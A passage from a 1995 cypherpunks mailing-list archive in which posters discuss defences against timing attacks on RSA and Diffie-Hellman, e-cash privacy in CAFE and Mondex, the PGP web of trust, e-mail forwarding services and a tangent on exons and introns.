3.89 a year and a half ago; I finally got around to updating my changes for 3.91. It's relatively seamless but provides no convenient means of decryption from within PINE. diffs available from: ftp://ftp.foxholly.com/pub/pine-pgp-patch - -- Tod McQuillin -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM5Rs3hYKXs9uIwxAQHDlAP/Rku0lbeaVPfTwZsfFxjbov0KZ5PAcLkJ emrE9vpr0pMSESuy0jIp7VRMHSUGA0Q0y7VFhinDxbsLT4FdVsCk5uxwieerzT/g pnI7N8yNzVgM1IDXGL9lzGMyidULRoSnfSePT9AAjJxaIHOOK8+rw2bT4Cv1vDPw JZFOFxhqW/U= =osQC -----END PGP SIGNATURE----- From mrami at mramirez.sy.yale.edu Tue Dec 12 23:05:57 1995 From: mrami at mramirez.sy.yale.edu (Marc Ramirez) Date: Wed, 13 Dec 1995 15:05:57 +0800 Subject: EXON In-Reply-To: <199512122017.OAA20584@khijol> Message-ID: On Tue, 12 Dec 1995, Ed Carp (ecarp at netcom.com) wrote: > > From: Rich Graves > > > > (There is some controversy in molecular biology circles as to whether > > "junk DNA" is really "junk" just because it doesn't build proteins. It > > could perform a regulatory or "frame-check" function.) > > Actually, I think that once the matter is further studied, scientists > will discover that the "junk DNA" is not junk, but inactive DNA, > waiting for a "trigger". Well, there are a couple of interesting things: o mutations in non-coding sequences are known to cause certain flavors of cancer, and o the amount of redundancy in exons is rather high in comparison to the coding sequences (much like other Exons we know :), approaching that of other naturally arising degradation-resistant signals, such as human language. So the signs as of right now are definitely pointing to exons having some purpose. The problem is that exons usually lay outside the start and stop sequences, so nobody knows how they are read, which makes it hard to give them an interpretation. Marc. ObCrypto: Store your private key in your non-coding DNA? If we all did that would the Red Cross become the national voluntary key escrow agent? Would that actually be good because then they would mislabel all they keys and destroy half of the lot in the process of collection? If cancerous cells had PGP keys, would the immune system destroy them or just detain them for a really long time until they withered away of malnutrition and stress? Should I go to bed? From ses at tipper.oit.unc.edu Tue Dec 12 23:17:27 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 13 Dec 1995 15:17:27 +0800 Subject: EXON [Noise] In-Reply-To: Message-ID: Exon Exoff Exon, Exoff The Censor From fc at all.net Tue Dec 12 23:17:37 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Wed, 13 Dec 1995 15:17:37 +0800 Subject: The Elevator Problem (a.k.a. build a private key in public) Message-ID: <9512130511.AA25229@all.net> Alice: tell Bob your public key Bob: use Alice's public key to encrypt a random number and tell it to everyone Now: start communicating using the random number as a private key. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From stewarts at ix.netcom.com Wed Dec 13 00:29:47 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 13 Dec 1995 16:29:47 +0800 Subject: Potential defense against timing attack on Diffie-Hellman Message-ID: <199512130743.XAA25025@ix7.ix.netcom.com> Follow-on defense for low-memory smartcards: This is a bit ugly and I'm not sure how much it protects your information, but it's some help for systems that can't store 1024 partial products 1024 bits long, which smartcards generally can't be expected to do :-) Pick k random values K1, K2, .. Kk, where k is some medium-sized number; probably about 10 though maybe more would be better. Calculate Y[i] = Y**2**i, i=1...log x, as before, but instead of calculating r[i] = r[i-1] or r[i-1]*Y[i], i=1...logx, calculate separate subproducts for i={1...K1}, {K1+1...K2}, ... {Kk...logx}, and then multiply those subproducts together. The easy way to do this is keep second running product P, and whenever you reach Kj, set P = P*r[i], and set r[i]=1 for the next round of (Kj)+1...K(j+1). You still need to calculate r[i-1]*Y[i] whether you're using it or not. For added obnoxiousness, at the cost of about 50% more calculation, you could calculate Yinv = Y**-1 mod m, and calculate r[i] and Y**i for i = 1...Kj, calculate through Y[logx] ignoring the r[]s, and then calculate r[i] and Y[logx] * Yinv**[logx-i] for i=logx....Kj+1. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From ecarp at netcom.com Wed Dec 13 00:39:24 1995 From: ecarp at netcom.com (Ed Carp (ecarp@netcom.com)) Date: Wed, 13 Dec 1995 16:39:24 +0800 Subject: e-Cash: CAFE vs. Mondex Message-ID: <199512130705.BAA22782@khijol> > Date: Tue, 12 Dec 1995 11:34:58 +0100 > To: David Klur > From: Matthias Schunter > Subject: Re: e-Cash: CAFE vs. Mondex > Cc: pfitzb at informatik.uni-hildesheim.de, WMI at ZURICH.IBM.COM, > cypherpunks at toad.com, WWW-BUYINFO at allegra.att.com > Dear Mr. Klur, > > > I'm member of the CAFE consortium but I can not answer your question. > As far as we know, the details of the Mondex protocols are still > confidential (or only available under a non-disclosure license). Oh, I see. Is this another one of those "we won't let you make sure that your money is safe with us, you'll just have to trust us" sort of things? Security through obscurity was never a very strong selling suit, especially to those who know that STO very likely hides a very weak encryption/authentication scheme. From jamesd at echeque.com Wed Dec 13 00:42:23 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 13 Dec 1995 16:42:23 +0800 Subject: Netscape announces position against GAK Message-ID: <199512130723.XAA11951@blob.best.net> At 11:06 PM 12/12/95 -0500, Black Unicorn wrote: > I haven't seen 'good behavior' worth much notice yet. Like I said, it > takes about 10 minutes to come up with a written policy. Netscape may > have done more than that, but who's to say? > > I'll be impressed when I see a sustained record of activism on the issue. > Till then they are slimy corporate types. Which, IMHO, is fine so long > as they don't claim to be anything else. While I am unhappy about many aspects of their statement, notably that they use the governments phrase "key escrow" all over the place, the fact is they have placed news about what mischief the government is up to, on a location that get a totally stupendous number of hits. This will notify a stupendous number of people what the government is up to. It is less than they could have done, less than they should have done, but it is still a very big something, and having done this, before the entire internet and all their customers, it is at least somewhat difficult for them to then turn around and shop their customers to the state. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From zinc at zifi.genetics.utah.edu Wed Dec 13 00:46:41 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Wed, 13 Dec 1995 16:46:41 +0800 Subject: EXON In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 13 Dec 1995, Marc Ramirez wrote: > Date: Wed, 13 Dec 1995 00:21:32 -0500 (EST) > From: Marc Ramirez > To: "Ed Carp (ecarp at netcom.com)" > Cc: Rich Graves , > High Society List > Subject: Re: EXON > > On Tue, 12 Dec 1995, Ed Carp (ecarp at netcom.com) wrote: > > > > From: Rich Graves > > > > > > (There is some controversy in molecular biology circles as to whether > > > "junk DNA" is really "junk" just because it doesn't build proteins. It > > > could perform a regulatory or "frame-check" function.) > > > > Actually, I think that once the matter is further studied, scientists > > will discover that the "junk DNA" is not junk, but inactive DNA, > > waiting for a "trigger". > > Well, there are a couple of interesting things: > > o mutations in non-coding sequences are known to cause certain > flavors of cancer, and > > o the amount of redundancy in exons is rather high in comparison > to the coding sequences (much like other Exons we know :), > approaching that of other naturally arising degradation-resistant > signals, such as human language. > > So the signs as of right now are definitely pointing to exons having some > purpose. The problem is that exons usually lay outside the start and > stop sequences, so nobody knows how they are read, which makes it hard to > give them an interpretation. folks, say yes to proof reading. sorry to perpetuate this thread any more but as one of the resident biochemists/mol biologists i've got an itch to scratch. in the lines with the single '>' above, you need to replace the word 'exon' with 'intron'. exons --> DNA sequences in a gene that (can) yield protein after splicing introns --> DNA sequences that are interspersed between exons in a gene introns have several known roles, including roles in RNA splicing and RNA editing (a process that sort of skirts the central dogma of DNA -> RNA -> protein by changing the 'code' in the RNA). non-coding sequences represent the bulk of DNA, and for the most part it's role is unknown although various people have their pet theories. gene regulation is often carried out by non-coding sequences, including sequences that are never transcribed into RNA. thus, they can be involved in any cancer process. patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA! ** FINGER zinc-pgp at zifi.genetics.utah.edu for pgp public key - CRYPTO! zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM6AeE3Qo/lG0AH5AQEwrAQAiVWuSI1nP8AzT6IEQU9yucb/VCkU4V4K h3LUhnlfBrDsUujI2FbS3jPIh9apVcQ7dy4Di0xYTxUalZ82l6MJqfh+an7S09df N6SpdgiRweefw2VQQcA5GbMPfaZFdmm5yRbDbuBF9HYlnpY8g63DmDDft7xGg4s8 koeh8v2/KTs= =uX7u -----END PGP SIGNATURE----- From gbroiles at darkwing.uoregon.edu Wed Dec 13 00:47:02 1995 From: gbroiles at darkwing.uoregon.edu (Greg Broiles) Date: Wed, 13 Dec 1995 16:47:02 +0800 Subject: e-mail forwarding, for-pay remailers Message-ID: <199512130721.AA23573@ideath.goldenbear.com> I don't have much faith that the people who are currently doing the DNS for my domain name (goldenbear.com) are going to do anything about the current bouncing-messages phenomenon anytime soon, so I'm looking into other ways to get & send E-mail (e.g., more persistent than this address which will disappear when I'm done with school in ~ 6 months). I've found a few services which may be of interest to C-punks because they're useful for creating/maintaining persistent cyberspace identities with no necessary connection to a "real name". I'm not listing the alpha-style alias servers because they depend on underlying remailers which I think makes them likely to be slower & less reliable; also, they won't store E-mail for you, such that you could connect every day or two or [...] to pick it up. I'm also ignoring the zillions of ISP's because I think that the market is separating (or ought to) into service/storage providers and connectivity providers. My hunch is that in the next year or so it's going to become easy to get nationwide dialups for IP connectivity the way it was done for X.25 10 years ago, so you won't care *where* you are, you'll be able to get an IP connection back to the folks that hold your mail, and you won't give a shit where *they* are. Then again, if the Exon stuff passes, I suspect that all we'll be left with in the US are service providers who deal with us at the level of IP packets and get (quasi-)common carrier status, acting just like Sprintnet/Tymnet/Telenet/CPN, but with IP not X.25. We'll all connect to offshore providers to pick up our E-mail and read our newsgroups, the control freaks will hate it, and we won't care. netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage or forwarding for people; they let you sign up for a trial month for free. They ask for name/address/phone (which could easily be a Mailboxes Etc address and a voicemail from Mailboxes Etc or whatever) and accept payment by check or credit card. They'll store incoming email or forward it to another account. They'll do header rewriting (similar to the anonymous remailers) so that outgoing mail looks like it came from this address. thebook.com ( http://www.thebook.com ) provides web pages and E-mail storage or forwarding or E-mail -> FAX conversion, and also let you sign up for a free month to try things out. They also ask for name/address/phone. You can send incoming Emails to different places depending on wildcard-based filter criteria. The ACM ( http://www.acm.org ) provides e-mail forwarding and web pages to ACM members ($25 for students or ~$80 for professionals) for ~ $25/year. Hiway Technologies ( http://www.hway.com ) provides web pages and will accept/forward mail sent to your own domain name for pretty cheap. I'm planning to make a wee FAQ on this for my home page, please send along comments re these folks or suggestions about others. -- "The anchored mind screwed into me by the psycho- Greg Broiles lubricious thrust of heaven is the one that thinks every temptation, every desire, every inhibition." greg at goldenbear.com -- Antonin Artaud gbroiles at darkwing.uoregon.edu From jamesd at echeque.com Wed Dec 13 00:48:45 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 13 Dec 1995 16:48:45 +0800 Subject: Usability of Cryptography (was Re: More FUD from First Virtual) Message-ID: <199512130722.XAA11947@blob.best.net> At 01:06 PM 12/11/95 -0700, Bryce wrote: > To get to the point, I want to know if this "fundamental > tradeoff" that you refer to is in fact *fundamental*. That is > to say: is the product of the "security factor" and the > "usability factor" a constant? Or are there methods which can > be practically implemented to make strong cryptography easier > for Joe Average to use without exposing Joe to unnecessary > risks? Web of trust is a mess because it attempts to link keys to physical people, which in general cannot be done. If we stick to a lesser goal -- constancy of identity -- this is not so hard. In general it is impossible to prove that Bryce is the "real" Bryce, but it is trivial to prove that Bryce is the same Bryce who has a certain Web page, and the same Bryce who posted a certain article in archives. We should blow off this attempt to do the impossible. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From mrami at mramirez.sy.yale.edu Wed Dec 13 00:51:36 1995 From: mrami at mramirez.sy.yale.edu (Marc Ramirez) Date: Wed, 13 Dec 1995 16:51:36 +0800 Subject: EXON In-Reply-To: Message-ID: On Wed, 13 Dec 1995, zinc wrote: > sorry to perpetuate this thread any more but as one of the resident > biochemists/mol biologists i've got an itch to scratch. > > in the lines with the single '>' above, you need to replace the word > 'exon' with 'intron'. Oops. Brain fart. Sorry. Marc. From tomw at netscape.com Wed Dec 13 01:31:54 1995 From: tomw at netscape.com (Tom Weinstein) Date: Wed, 13 Dec 1995 17:31:54 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512121525.KAA09078@homeport.org> Message-ID: <30CE08D2.41C6@netscape.com> Dr. Frederick B. Cohen wrote: > > One way with the RSA might be to do the encryption with the key and > the inverse of the key (hence all 0s become 1s and 1s become 0s). Nope, this doesn't work. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at netscape.com From nsb at nsb.fv.com Wed Dec 13 05:59:24 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Wed, 13 Dec 1995 21:59:24 +0800 Subject: Usability of Cryptography (was Re: More FUD from First Virtual) In-Reply-To: <199512130722.XAA11947@blob.best.net> Message-ID: Excerpts from mail.limbo: 12-Dec-95 Re: Usability of Cryptograp.. "James A. Donald"@echequ (1242*) > If we stick to a lesser goal -- constancy of identity -- > this is not so hard. In general it is impossible to prove that > Bryce is the "real" Bryce, but it is trivial to prove that > Bryce is the same Bryce who has a certain Web page, and the > same Bryce who posted a certain article in archives. Agreed completely, if you add: "....unless the person claiming to be Bryce is someone who managed to steal secret keys from that same Bryce." Without this clause, it seems to me you're assuming that secret keys (or other identity-verifying tokens) can't ever be stolen. Insofar as you use multiple things (cryptography, IP address, etc.) to identify someone, you can make it harder to impersonate someone, but each of these things is ultimately forge-able. -- NB -------- Nathaniel Borenstein (FAQ & PGP key: nsb+faq at nsb.fv.com) Chief Scientist, First Virtual Holdings VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf From stripes at va.pubnix.com Wed Dec 13 06:33:48 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Wed, 13 Dec 1995 22:33:48 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512120056.QAA16055@mage.qualcomm.com> Message-ID: In message <199512120056.QAA16055 at mage.qualcomm.com>, Peter Monta writes: >> Of course, this works against a remote adversary, but not against one >> on the same machine who can look at actual CPU consumption (which doesn't >> increase when the target is blocked). > >Maybe this is a good reason to spinwait, rather than sleep, until >the timer expires. It would be pretty subtle to distinguish that >from "real" computation. Across a net it should be hard. On the same CPU it may be easy. Some CPUs with hardware branch prediction keep track of how many branches were correctly and incorrectly predected. These registers are not allways protected, and not allways "made virtual" by the OS. If your spin wait is of the form: LOAD #big_number, R1 L1: DEC R1 BNE L1 (a.k.a "for(i = big_number; i--;) { }") Then the "number of correctly predicted branches" will go up by approximatly big_number... (in all honesty the only CPU I am sure "allows" normal user programs to see the performance registers is the AMD29xxx series, and that is only if the OS sets the right bit in the register protection mask. I know the P6 has such performance registers, but don't know if they are protected, and I think the P5 has them, but again I don't know if they are protected. I think some of the Alpha's have them, but seem to remember them being protected (and I use to think it was a dumb idea...)) From remailer at armadillo.com Wed Dec 13 06:37:51 1995 From: remailer at armadillo.com (Armadillo Remailer) Date: Wed, 13 Dec 1995 22:37:51 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <199512131315.HAA01726@monad.armadillo.com> Simon Spero writes: >My gut & scribble-on-the-back-of-a-napkin feeling about this class of >attack is that it could be a problem for smartcards (almost certainly) Is it a problem to create smartcards that do their calculations in fixed time? I'd guess it should be easier than on multi-purpose hardware. Does the attack work for existing smartcards? From adam at lighthouse.homeport.org Wed Dec 13 07:03:10 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Wed, 13 Dec 1995 23:03:10 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512131315.HAA01726@monad.armadillo.com> Message-ID: <199512131439.JAA10842@homeport.org> Armadillo Remailer wrote: | >My gut & scribble-on-the-back-of-a-napkin feeling about this class of | >attack is that it could be a problem for smartcards (almost certainly) | | Is it a problem to create smartcards that do their calculations in | fixed time? I'd guess it should be easier than on multi-purpose | hardware. Not if the fixed time is in weeks. If you read the Crypto proceedings, you'll find a number of papers on using an (untrusted) CPU, such as that in a cash machine, to aid a smartcard. This is because the CPUs in smartcards are very slow. Maximchuck, at Bell Labs, has a protocol for Anonymous Credit Cards which uses pre-chosen private keys between correspondants and a set of remailers to anonymize credit card transactions with respsect to a merchant. (The bank still knows who's buying how much, and I think where.) Anyway, he freely admits that the reason for private key work is their cards couldn't handle the public key operations. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From adam at lighthouse.homeport.org Wed Dec 13 07:39:13 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Wed, 13 Dec 1995 23:39:13 +0800 Subject: e-Cash: CAFE vs. Mondex In-Reply-To: Message-ID: <199512131446.JAA10908@homeport.org> Matthias Schunter wrote: | The CAFE system is a cheque based system. This means that the | customer receives an electronic chequebook, where each cheque is | (blindly) signed by the bank. | During each payment the customer has to use one of these signed cheques. | privacy-protecting | The privacy of the user is protected. How do checks protect the privacy of the user? The bank knows who is spending how much with whom for each check. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From perry at piermont.com Wed Dec 13 07:52:08 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 13 Dec 1995 23:52:08 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: Message-ID: <199512131500.KAA01853@jekyll.piermont.com> Simon Spero writes: > Perry - I don't think NTP goes down to the sort of resolution that > appeared to be where the signal is here, and for quantisation reasons, I > don't think it can work over a public routed internetwork. The question isn't whether you can really get the timing down as far as you want, but whether you can use statistics to cut down your search space sufficiently to make things interesting. I can't say, but I'm no longer prepared to trust the stuff, being fairly conservative in what I trust. Perry From EALLENSMITH at ocelot.Rutgers.EDU Wed Dec 13 08:10:20 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Thu, 14 Dec 1995 00:10:20 +0800 Subject: SmartGate Message-ID: <01HYQ7HJ7XTC8Y4YHK@mbcl.rutgers.edu> This looks like they're using Diffie-Hellman. Does anyone know anything further? -Allen --------------------------- > Reuters New Media _ Tuesday December 12 6:33 AM EST _ V-One Unveils Internet Security Technology ROCKVILLE, Md. (Reuter) - V-One Corp. says it has introduced security technology called SmartGate that enables companies to build a secure system to conduct transactions on the Internet computer network. SmartGate is transaction-based software that uses encryption to ensure protection over an open network, the privately held company said Monday. Encryption scrambles the data and in the SmartGate system, a key to decode the data is generated that is unique to a specific transaction session. V-One, which stands for Virtual Open Network Environment, said SmartGate is available now directly from the Rockville, Md.-based company. It said SmartGate can be purchased in either a hardware-software or software-only form. The SmartGate server retails for $9,995 and the software-only version is $4,995. A server is computer that manages the flow of data in a network. SmartGate licenses are priced at $79, with reductions offered for volume purchases. From hfinney at shell.portal.com Wed Dec 13 08:10:22 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 14 Dec 1995 00:10:22 +0800 Subject: Blinding against Kocher's timing attacks Message-ID: <199512122127.NAA15216@jobe.shell.portal.com> From: ljo at ausys.se (Johansson Lars) > Does anyone know whether David Chaum's patent on > blind digital signatures extends to this application? I don't think it would. Chaum's blinding protocol has one major difference: the blinding factor is applied by a different person than the one doing the signing. The purpose of the blinding is different, too; in Chaum's case the idea is to end up with a signature which is unknown to the signer, while with Kocher's "defensive blinding" the signature (or decryption) is an ordinary RSA one, and the blinding is just done internally by the signer to randomize the timing. (I gather BTW that the idea of the blinding is for the server to have pre-chosen a random r and pre-calculated r^d mod n, and then when he is given c to decrypt he first does c*r mod n and then decrypts this, then takes the result and divides by r^d.) It's conceivable that Kocher's blinding would be a patentable technique in itself, and not impossible that he has already applied for a patent before publishing. Probably he would have said so if that were his intention, though. Hal "Blind defensively - watch out for the other guy..." From futplex at pseudonym.com Thu Dec 14 00:29:00 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 14 Dec 95 00:29:00 PST Subject: The Elevator Problem (a.k.a. build a private key in public) In-Reply-To: <9512130511.AA25229@all.net> Message-ID: <199512140828.DAA19405@opine.cs.umass.edu> > Alice: tell Bob your public key > Bob: use Alice's public key to encrypt a random number and tell it to everyone > > Now: start communicating using the random number as a private key. It's far from clear that this is a patent-free solution. -Futplex From trei at process.com Wed Dec 13 08:42:45 1995 From: trei at process.com (Peter Trei) Date: Thu, 14 Dec 1995 00:42:45 +0800 Subject: NT Password Security Update. Registry values changed! Message-ID: <9512131601.AA04595@toad.com> > Ted Cabeen wrote: > > > Well, I did some more research into the NT password security issue and I > > discovered that I can get access to the Security section of the registry > How did you do that? The SECURITY section is always greyed out and the > operating system will not allow you to change the permissions on it. > If you did indeed gain access to that area then you've probably found a > flaw in the tamperproof capabilities of NT. > - Andy Andy, do you have Administrator privs on your NT system? I too seem to have full access to all registry entries, including all under Security. M$ may have some hidden areas in the registry (security by obscurity), but I can't see anything that says 'sorry, you can't look here'. Speaking for myself. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From schunter at informatik.uni-hildesheim.de Wed Dec 13 10:23:18 1995 From: schunter at informatik.uni-hildesheim.de (Matthias Schunter) Date: Thu, 14 Dec 1995 02:23:18 +0800 Subject: e-Cash: CAFE vs. Mondex Message-ID: At 9:46 Uhr 13.12.1995, Adam Shostack wrote: >Matthias Schunter wrote: > >| The CAFE system is a cheque based system. This means that the >| customer receives an electronic chequebook, where each cheque is >| (blindly) signed by the bank. >| During each payment the customer has to use one of these signed cheques. > >| privacy-protecting >| The privacy of the user is protected. > > How do checks protect the privacy of the user? The bank >knows who is spending how much with whom for each check. No. The cheques are certified blindly. I.e., the bank does not see them during signing/withdrawal and therefore doe not re-recognize them. However, the bank does know how much money each participant receives or spends, but not who's paying whom. m % Matthias Uni Hildesheim +49(5121)883-788 fax-732 From ses at tipper.oit.unc.edu Wed Dec 13 10:26:33 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 14 Dec 1995 02:26:33 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512121306.IAA02006@jekyll.piermont.com> Message-ID: On Tue, 12 Dec 1995, Perry E. Metzger wrote: > > Go ahead and trust that no one can do it, then. Considering that NTP > can synch up clocks over the net with astonishing accuracy with > multiple probes, it would be hard to believe that you couldn't Perry - I don't think NTP goes down to the sort of resolution that appeared to be where the signal is here, and for quantisation reasons, I don't think it can work over a public routed internetwork. I'm still open to having my mind changed here; my network weenie gut instincts tell me that routing is too non-random for the signal to propogate. [I may have misread the paper, but the accuracy required seemed to be on the order of 10-100 usecs; if I've got that wrong, could someone mail me an OOM to be working with] Simon From support at marktwain.com Wed Dec 13 11:13:34 1995 From: support at marktwain.com (Mark Twain Ecash Support) Date: Thu, 14 Dec 1995 03:13:34 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <199512131624.KAA20591@admin.starnet.net> At 09:39 AM 12/13/95 -0500, you wrote: >Armadillo Remailer wrote: > >| >My gut & scribble-on-the-back-of-a-napkin feeling about this class of >| >attack is that it could be a problem for smartcards (almost certainly) >| >| Is it a problem to create smartcards that do their calculations in >| fixed time? I'd guess it should be easier than on multi-purpose >| hardware. > > Not if the fixed time is in weeks. > > If you read the Crypto proceedings, you'll find a number of >papers on using an (untrusted) CPU, such as that in a cash machine, to >aid a smartcard. This is because the CPUs in smartcards are very >slow. DigiCash has been aware of the timing problem for years. Especially as it relates to smartcards, for which you can get timings down to the clock cycle. Cosequently, both DigiCash's smartcards and DigiCash's Ecash use fixed timings. --Lucky at work --Mark Twain Bank Ecash Support Ecash. The secure Internet payment system that protects your privacy. From frantz at netcom.com Wed Dec 13 11:42:43 1995 From: frantz at netcom.com (Bill Frantz) Date: Thu, 14 Dec 1995 03:42:43 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <199512131812.KAA25397@netcom18.netcom.com> At 8:30 12/13/95 -0500, Josh M. Osborne wrote: >In message <199512120056.QAA16055 at mage.qualcomm.com>, Peter Monta writes: >>> Of course, this works against a remote adversary, but not against one >>> on the same machine who can look at actual CPU consumption (which doesn't >>> increase when the target is blocked). >> >>Maybe this is a good reason to spinwait, rather than sleep, until >>the timer expires. It would be pretty subtle to distinguish that >>from "real" computation. > >Across a net it should be hard. On the same CPU it may be easy. Some >CPUs with hardware branch prediction keep track of how many branches were >correctly and incorrectly predected. These registers are not allways >protected, and not allways "made virtual" by the OS. Of course you can spend the time doing exponentiation of random (pseudorandom would probably do) numbers, and when the timer pops, longjump out to return your answer. ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From BRUEN at mitlns.mit.edu Wed Dec 13 14:21:16 1995 From: BRUEN at mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science) Date: Thu, 14 Dec 1995 06:21:16 +0800 Subject: OSF security announcement Message-ID: <951213151725.60204104@mitlns.mit.edu> The following is part of an OSF announcement. Most of the marketing hype has been deleted, but I thought the security part would be of interest. Bob ------------------------------------------------------------------ CAMBRIDGE, MA, December 12, 1995 -- The Open Software Foundation (OSF) today announced the DCE-Web Advanced Technology Offering (ATO). The goal of this software project is to provide all of the essential capabilities of the distributed computing environment (encryption, ^^^^^^^^^ --snip--- * Secure Local Proxy - provides secure DCE-Web access using standard off-the-shelf browsers. It is possible to access DCE-Web using any browser without any modification. The Secure Local Proxy functions as protocol switch, forwarding proxy requests either as standard http or using the secure DCE-Web protocol. * Secure Gateway - integrates the DCE-Web with other secure Web protocols. The Gateway provides secure access to the Multi-protocol Server, providing DCE authentication based on public key identities. The gateway is designed to allow plug-in access for multiple public key Web protocols. --snip-- For more information on this ATO please refer to the project home page at http://www.osf.org/www/dceweb/. --snip--- CONTACT: Jane Smeloff Open Software Foundation (617) 621-8997 Email: jane at osf.org From warlord at ATHENA.MIT.EDU Wed Dec 13 14:22:46 1995 From: warlord at ATHENA.MIT.EDU (Derek Atkins) Date: Thu, 14 Dec 1995 06:22:46 +0800 Subject: IDEA encryption In-Reply-To: Message-ID: <199512130237.VAA21019@charon.MIT.EDU> > The copy of the source for idea (unix) that I have specify's a user key > length of 8 bytes, but allows this to be increased to something larger. > Will increasing the user keylength improve the overall security? Umm, I think you are confused. First, IDEA has a keysize of 16 bytes, not 8. Second, it cannot be easily changed. Sure, your code probably has a #define for the keysize, but that is just to describe the magic number, not to make it easy to change it. Increasing the keylength of IDEA, without changing anything else, will probably _NOT_ make it more secure. > Last thing -- how secure is unix "rm"? If something is rm'd, is it > really really gone? Well, it depends on what you mean by "really really gone". All RM does is remove the link from the directory entry to the file inode on disk. If the inode refcount reahes zero, then the disk blocks are marked as free. However the data in those blocks remain on disk until another file writes over them. It is theoretically possible to write a program to "unrm" a file. -derek From wilcoxb at nagina.cs.colorado.edu Wed Dec 13 14:24:38 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce) Date: Thu, 14 Dec 1995 06:24:38 +0800 Subject: Web O Trust, active attacks against same, etc. AGAIN. (was: Usability of Cryptography (was Re: More FUD from First Virtual) ) In-Reply-To: <199512130722.XAA11947@blob.best.net> Message-ID: <199512132039.NAA14799@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- An entity calling itself "James A. Donald" allegedly wrote: > > Web of trust is a mess because it attempts to link keys to > physical people, which in general cannot be done. ******************************* Do you wish to substantiate this rather brazen assertion? I am very sure that PGP public key 0xCC56B2E9 belongs to my housemate Sebastian Kuzminsky . Is there some reason why I should doubt this belief? Furthermore my mother <0x5E93210D> is very sure that PGP public key 0x617c6db9 belongs to me, and she is very sure that I am a trustworthy introducer of keys. Is there some reason why she should abstain from associating Seb's key <0xCC56B2E9> in her mind with my housemate? > If we stick to a lesser goal -- constancy of identity -- > this is not so hard. In general it is impossible to prove that > Bryce is the "real" Bryce, but it is trivial to prove that > Bryce is the same Bryce who has a certain Web page, and the > same Bryce who posted a certain article in archives. But if I am the victim of a successful active attack then you are *not* certain that I am the same Bryce. The Bryce who posted a certain article in the archives might be completely different from (and antagonistic toward!) the Bryce who later contacts you in e-mail using the same public key. Do you see why? > We should blow off this attempt to do the impossible. It is far from impossible. In fact, it is easy if we pay attention and cooperate. Note that I am in complete agreement with you about the (non-) value of "True" identities. In the above example I do not expect you to care which Bryce is the "real" Bryce, but I *do* expect you to care that the two Bryces are different. In short, the Web O Trust is important to maintain constancy of identity. It is not trivial, but neither is it impossible, to do so. Regards, Bryce, a unique and autonomous entity signatures follow "To strive, to seek, to find and not to yield." -Tennyson bryce at colorado.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01 iQCVAwUBMM855vWZSllhfG25AQG8JQP+Ikc9sfUdEQHhLTM1/cTlimFBKB/ppifD N58Eh6e6UboOeoatcLdHgEEkrewhYkVD+AcIoV5CUHLt22Q88vjH2Fq9jJ+tV3CO 65r9kyVeIg49qQZHx0FrSTytoTrY3Zg9RdJoh4zT/Vy36dCcwgRcfAzkPdMBfQqU W9mViQbS5w0= =KyrB -----END PGP SIGNATURE----- From EALLENSMITH at ocelot.Rutgers.EDU Wed Dec 13 14:30:02 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Thu, 14 Dec 1995 06:30:02 +0800 Subject: Usability of Cryptography (was Re: More FUD from First Virtual) Message-ID: <01HYRK16QTSM8Y4Z3G@mbcl.rutgers.edu> From: IN%"jamesd at echeque.com" "James A. Donald" 